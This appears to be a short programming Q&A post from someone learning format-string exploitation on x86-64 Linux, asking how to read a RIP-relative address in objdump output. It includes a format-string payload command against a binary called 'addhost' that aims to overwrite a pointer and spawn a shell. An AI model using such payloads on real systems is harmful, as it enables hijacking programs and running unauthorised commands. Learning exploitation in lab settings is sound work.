# Reading the output of objdump on linux x86_64

Tags: linux, pointers, x86-64, exploit, objdump

I am trying to learn to exploit a sprintf vulnerability.
I've gotten to:

```
env -i ./addhost a a "$(python -c 'import sys; sys.stdout.write("sh;#AAAABBBB%037956x%10$hp%63387x%10$hp")')"
```

But reading the objdump code on x86_64 I get addresses like:

```
jmpq   *0x20093a(%rip)
```

Which would imply that to get to it I would need to put:

```
\x3a\x09\x20\x00\x3c\x09\x20\x00
```

But the NULL doesn't go through.
I'm not sure where to go from here, or if I'm reading the pointer wrong.